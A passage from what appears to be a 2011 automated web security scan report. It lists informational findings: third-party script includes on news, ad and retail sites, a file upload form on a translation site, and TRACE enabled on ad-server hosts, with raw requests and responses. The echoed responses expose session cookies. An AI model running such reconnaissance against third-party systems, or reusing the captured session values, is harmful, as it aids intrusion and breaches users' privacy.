<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...

22.111. http://www.ndtv.com/video/player/flashback/flashback-the-magic-of-rishi-kapoor/209786  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ndtv.com
Path:   /video/player/flashback/flashback-the-magic-of-rishi-kapoor/209786

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /video/player/flashback/flashback-the-magic-of-rishi-kapoor/209786 HTTP/1.1
Host: www.ndtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Cache-Control: max-age=592
Expires: Sun, 04 Sep 2011 04:53:20 GMT
Date: Sun, 04 Sep 2011 04:43:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 137593

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.c
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...

22.112. http://www.ndtv.com/video/player/news/no-regrets-for-tweet-on-afzal-guru-says-omar-abdullah/209797  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ndtv.com
Path:   /video/player/news/no-regrets-for-tweet-on-afzal-guru-says-omar-abdullah/209797

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /video/player/news/no-regrets-for-tweet-on-afzal-guru-says-omar-abdullah/209797 HTTP/1.1
Host: www.ndtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Cache-Control: max-age=149
Expires: Sun, 04 Sep 2011 04:45:38 GMT
Date: Sun, 04 Sep 2011 04:43:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 139045

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.c
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...

22.113. http://www.ndtv.com/video/player/the-big-fight/life-or-death-should-terrorists-be-shown-mercy/209810  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ndtv.com
Path:   /video/player/the-big-fight/life-or-death-should-terrorists-be-shown-mercy/209810

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /video/player/the-big-fight/life-or-death-should-terrorists-be-shown-mercy/209810 HTTP/1.1
Host: www.ndtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Cache-Control: max-age=405
Expires: Sun, 04 Sep 2011 04:50:03 GMT
Date: Sun, 04 Sep 2011 04:43:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 137738

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.c
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...

22.114. http://www.ndtv.com/video/player/the-car-bike-show/first-look-at-hondas-small-car-for-india-brio/209809  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ndtv.com
Path:   /video/player/the-car-bike-show/first-look-at-hondas-small-car-for-india-brio/209809

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /video/player/the-car-bike-show/first-look-at-hondas-small-car-for-india-brio/209809 HTTP/1.1
Host: www.ndtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Cache-Control: max-age=232
Expires: Sun, 04 Sep 2011 04:47:13 GMT
Date: Sun, 04 Sep 2011 04:43:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 137681

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.c
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...

22.115. http://www.networkadvertising.org/managing/opt_out.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networkadvertising.org
Path:   /managing/opt_out.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /managing/opt_out.asp HTTP/1.1
Host: www.networkadvertising.org
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSASBDATQ=FCNKKPJCMDIJJDNIDDFMIMFA; __utma=1.1392774634.1315133979.1315133979.1315133979.1; __utmc=1; __utmz=1.1315133979.1.1.utmccn=(referral)|utmcsr=tidaltv.com|utmcct=/PrivacyDashboard.aspx|utmcmd=referral; __utmb=1

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 11:37:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Sat, 03 Sep 2011 11:37:58 GMT
Cache-control: no-cache


<script>
if(location.hostname != 'www.networkadvertising.org') {
window.location="http://www.networkadvertising.org/managing/opt_out.asp";
}
</script>

<script>
//_________________________
...[SNIP]...
<link rel = stylesheet href = "../library/nai_masterstyle.css" Type = "text/css">
   
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
<td valign=top><script src="http://www.tribalfusion.com/optout/verify.js?nocache=0.6739547" language="JavaScript"></script>
...[SNIP]...

22.116. http://www.networkadvertising.org/managing/opt_out.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networkadvertising.org
Path:   /managing/opt_out.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /managing/opt_out.asp HTTP/1.1
Host: www.networkadvertising.org
Proxy-Connection: keep-alive
Referer: http://tidaltv.com/PrivacyDashboard.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 10:59:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Sat, 03 Sep 2011 10:59:00 GMT
Cache-control: no-cache


<script>
if(location.hostname != 'www.networkadvertising.org') {
window.location="http://www.networkadvertising.org/managing/opt_out.asp";
}
</script>

<script>
//_________________________
...[SNIP]...
<link rel = stylesheet href = "../library/nai_masterstyle.css" Type = "text/css">
   
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
<td valign=top><script src="http://www.tribalfusion.com/optout/verify.js?nocache=0.1032608" language="JavaScript"></script>
...[SNIP]...

22.117. http://www.networkadvertising.org/managing/optout_results.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networkadvertising.org
Path:   /managing/optout_results.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

POST /managing/optout_results.asp HTTP/1.1
Host: www.networkadvertising.org
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
Content-Length: 873
Cache-Control: max-age=0
Origin: http://www.networkadvertising.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSASBDATQ=FCNKKPJCMDIJJDNIDDFMIMFA; __utma=1.1392774634.1315133979.1315133979.1315133979.1; __utmb=1; __utmc=1; __utmz=1.1315133979.1.1.utmccn=(referral)|utmcsr=tidaltv.com|utmcct=/PrivacyDashboard.aspx|utmcmd=referral

optThis=1&optThis=2&optThis=3&optThis=4&optThis=5&optThis=6&optThis=7&optThis=8&optThis=9&optThis=10&optThis=11&optThis=12&optThis=13&optThis=14&optThis=15&optThis=16&optThis=17&optThis=18&optThis=19&
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 11:12:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Sat, 03 Sep 2011 11:12:24 GMT
Cache-control: no-cache


<html>
   <head>
       <title> Welcome to Network Advertising Initiative </title>


       <link rel = stylesheet href = "../library/nai_masterstyle.css" Type = "text/css">
   
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
<td valign=top width="15" height="15">
       <script src=http://www.tribalfusion.com/optout/optout.js language=JavaScript></script>
...[SNIP]...

22.118. http://www.newspaperdirect.com/inprint/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newspaperdirect.com
Path:   /inprint/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /inprint/default.aspx HTTP/1.1
Host: www.newspaperdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 198731
Date: Sun, 04 Sep 2011 04:44:02 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
   <HEAD>
       <META http-equiv="Content-Type" content="text/html; charset=utf-8">
       <ME
...[SNIP]...
</form>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

22.119. http://www.simplymarry.com/timesmatri/faces/jsp/profileDisplay.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.simplymarry.com
Path:   /timesmatri/faces/jsp/profileDisplay.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /timesmatri/faces/jsp/profileDisplay.jsp HTTP/1.1
Host: www.simplymarry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:44:07 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_jk/1.2.31
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP01 (build: SVNTag=JBPAPP_4_3_0_GA_CP01 date=200804211746)/Tomcat-5.5
Set-Cookie: JSESSIONID=EFF5BB51C08EA6B27EE4AEDFB0BC3E32.SMAPP03; Path=/
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 42075


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</style>


<script type="text/javascript" src="http://jqueryjs.googlecode.com/files/jquery-1.3.2.js"></script>
...[SNIP]...

22.120. http://www.ticketmaster.com/Sporting-Kansas-City-tickets/artist/805957  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ticketmaster.com
Path:   /Sporting-Kansas-City-tickets/artist/805957

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Sporting-Kansas-City-tickets/artist/805957 HTTP/1.1
Host: www.ticketmaster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-TM-GTM-Origin: tmol-us-els1
Expires: Thu, 1 Jan 1970 00:00:00 GMT
P3P: policyref="/w3c/tmol/p3p.xml", CP="IDC DSP COR NID CURa ADMa DEVa PSAa OUR IND COM NAV INT"
Content-Type: text/html; charset=utf-8
Date: Sun, 04 Sep 2011 04:44:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: GEO_OMN=ba; path=/; domain=.ticketmaster.com
Set-Cookie: NEWSEARCH=1; path=/; domain=.ticketmaster.com
Content-Length: 353895


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotoc
...[SNIP]...
<!--
By use of this code snippet, I agree to the Brightcove Publisher T and C
found at http://corp.brightcove.com/legal/terms_publisher.cfm.
-->

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/APIModules_all.js"></script>
...[SNIP]...

22.121. http://www.timesjobs.com/candidate/job-search.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.timesjobs.com
Path:   /candidate/job-search.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /candidate/job-search.html HTTP/1.1
Host: www.timesjobs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:44:32 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP01 (build: SVNTag=JBPAPP_4_3_0_GA_CP01 date=200804211746)/Tomcat-5.5
Set-Cookie: JSESSIONID=IOpR7y80sf2bAlK6CbdyXg**.CANDAPP14; Domain=.timesjobs.com; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 120486


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       
       
                       
...[SNIP]...
</script>
           <script type="text/javascript" language="JavaScript"
               src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
       
       <script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
       </script>
...[SNIP]...

22.122. http://www.timesjobs.com/candidate/quickSearch.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.timesjobs.com
Path:   /candidate/quickSearch.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /candidate/quickSearch.html HTTP/1.1
Host: www.timesjobs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:44:47 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP01 (build: SVNTag=JBPAPP_4_3_0_GA_CP01 date=200804211746)/Tomcat-5.5
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 117484


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       
       
                       
...[SNIP]...
</script>
           <script type="text/javascript" language="JavaScript"
               src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
       
       <script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
       </script>
...[SNIP]...

22.123. http://www.youtube.com/results  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /results

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /results HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:45:37 GMT
Server: wiseguy/0.6.10
X-Content-Type-Options: nosniff
Set-Cookie: GEO=fb9357de7d7cb21a75c15aa9010c2cc8cwsAAAAzVVMyF3tqTmMCcQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: pc2pRNk9sazdfMmQ0ck9qTmYtN3o5cTJhOHMyNFlLQVd1SldxbGhieldOdXdJc2JWQ2xVMF9n -->
<head>

<script>
var yt = yt || {};yt.timing = yt.timin
...[SNIP]...
<link id="www-core-css" rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-core-vfl7UaQyq.css">


<script id="www-core-js" src="//s.ytimg.com/yt/jsbin/www-core-vflatRxZ9.js"></script>
...[SNIP]...

22.124. http://www.zigwheels.com/dealeroffer.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zigwheels.com
Path:   /dealeroffer.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /dealeroffer.php HTTP/1.1
Host: www.zigwheels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:45:24 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_jk/1.2.25 PHP/5.3.1
X-Powered-By: PHP/5.3.1
Location: http://www.zigwheels.com/buy-sell-car
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 94441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol
...[SNIP]...
<div class="topW">
    <script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
<div class="facebook-like">
<script src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
</a><script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://platform.twitter.com/anywhere.js?id=bK1XAz8rgXSelE7g6FqhLA&v=1" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...
<!-- COPYRIGHT 2010 Nielsen Online -->
<script type="text/javascript" src="//secure-uk.imrworldwide.com/v60.js">
</script>
...[SNIP]...
<!-- Place this tag in your head or just before your close body tag -->
<script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...

22.125. http://www2.panasonic.com/consumer-electronics/learn/Cameras-Camcorders/Digital-Cameras/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.panasonic.com
Path:   /consumer-electronics/learn/Cameras-Camcorders/Digital-Cameras/index.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /consumer-electronics/learn/Cameras-Camcorders/Digital-Cameras/index.jsp HTTP/1.1
Host: www2.panasonic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 04:40:35 GMT
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 89602

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


    <script>
cm_ClientID = "90122186;90122
...[SNIP]...
<!--OwnerIQ Retargeting tag -->


   <script type="text/JavaScript" src="http://px.owneriq.net/anst/s/pana.js"></script>
...[SNIP]...

23. File upload functionality  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Request

GET / HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:21:18 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en
X-Content-Type-Options: nosniff
Server: HTTP server (unknown)
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...
</div><input type=file name=file id=file size=40></div>
...[SNIP]...

24. TRACE method is enabled  previous  next
There are 94 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.


24.1. http://223.165.24.159/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://223.165.24.159
Path:   /

Request

TRACE / HTTP/1.0
Host: 223.165.24.159
Cookie: b4e5dd81a043adc6

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:36:06 GMT
Server: Apache/2.2.16 (Unix) DAV/2 PHP/5.2.14 mod_jk/1.2.30
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: 223.165.24.159
Cookie: b4e5dd81a043adc6; JSESSIONID=94BF0E17A9A49F1193F419E64CA53818.WIDGET01; __utma=174585377.228925820.1315103185.1315103185.1315103185.1; __utmb=174585377.1.10.1315103185; __utmc=174585377; __utmz=174585377.1315103185.1.
...[SNIP]...

24.2. http://33across.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://33across.com
Path:   /

Request

TRACE / HTTP/1.0
Host: 33across.com
Cookie: c3881b5eda9733fa

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:01:25 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: 33across.com
Cookie: c3881b5eda9733fa; 33x_ps=deleted; 33x_nc=33Across+Optout


24.3. http://ads.masslive.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.masslive.com
Path:   /

Request

TRACE / HTTP/1.0
Host: ads.masslive.com
Cookie: 2a60b369f5c60cef

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:01:18 GMT
Server: Apache/2.0.52 (CentOS)
Connection: close
Content-Type: message/http
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929170045525d5f4f58455e445a4a423660;expires=Sun, 04-Sep-2011 04:11:18 GMT;path=/;httponly

TRACE / HTTP/1.0
Host: ads.masslive.com
Cookie: 2a60b369f5c60cef; NSC_mc-pbt-qspe-ef=ffffffff0929170045525d5f4f58455e445a4a423660; crtg=1
Connection: Keep-Alive
OAS_IP: 50.23.123.106


24.4. http://ads.mlive.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.mlive.com
Path:   /

Request

TRACE / HTTP/1.0
Host: ads.mlive.com
Cookie: 6e15bdb36d37b1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:01:28 GMT
Server: Apache/2.0.52 (CentOS)
Connection: close
Content-Type: message/http
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929171e45525d5f4f58455e445a4a423660;expires=Sun, 04-Sep-2011 04:11:28 GMT;path=/;httponly

TRACE / HTTP/1.0
Host: ads.mlive.com
Cookie: 6e15bdb36d37b1; NSC_mc-pbt-qspe-ef=ffffffff0929171e45525d5f4f58455e445a4a423660; crtg=1
Connection: Keep-Alive
OAS_IP: 50.23.123.106


24.5. http://ads.nationchannel.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.nationchannel.com
Path:   /

Request

TRACE / HTTP/1.0
Host: ads.nationchannel.com
Cookie: f8c94bff304f104

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:52 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: ads.nationchannel.com
Cookie: f8c94bff304f104


24.6. http://ads.nationmultimedia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.nationmultimedia.com
Path:   /

Request

TRACE / HTTP/1.0
Host: ads.nationmultimedia.com
Cookie: 9c76f76217592c80

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:31:15 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: ads.nationmultimedia.com
Cookie: 9c76f76217592c80; _em_sv=-1; _cbclose=1; _cbclose32539=1; _uid32539=8467E527.1; _ctout32539=1; verify=test; _em_hl=1; __utma=113213211.1779481420.1315103161.1315103161.1315103161.1; __utmb=113213211.1.10.1315103165; _
...[SNIP]...

24.7. http://ads.oregonlive.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.oregonlive.com
Path:   /

Request

TRACE / HTTP/1.0
Host: ads.oregonlive.com
Cookie: 656e5f2572453f8a

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:00:11 GMT
Server: Apache/2.0.52 (CentOS)
Connection: close
Content-Type: message/http
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929171b45525d5f4f58455e445a4a423660;expires=Sun, 04-Sep-2011 04:10:11 GMT;path=/;httponly

TRACE / HTTP/1.0
Host: ads.oregonlive.com
Cookie: 656e5f2572453f8a; NSC_mc-pbt-qspe-ef=ffffffff0929171b45525d5f4f58455e445a4a423660; crtg=1
Connection: Keep-Alive
OAS_IP: 50.23.123.106


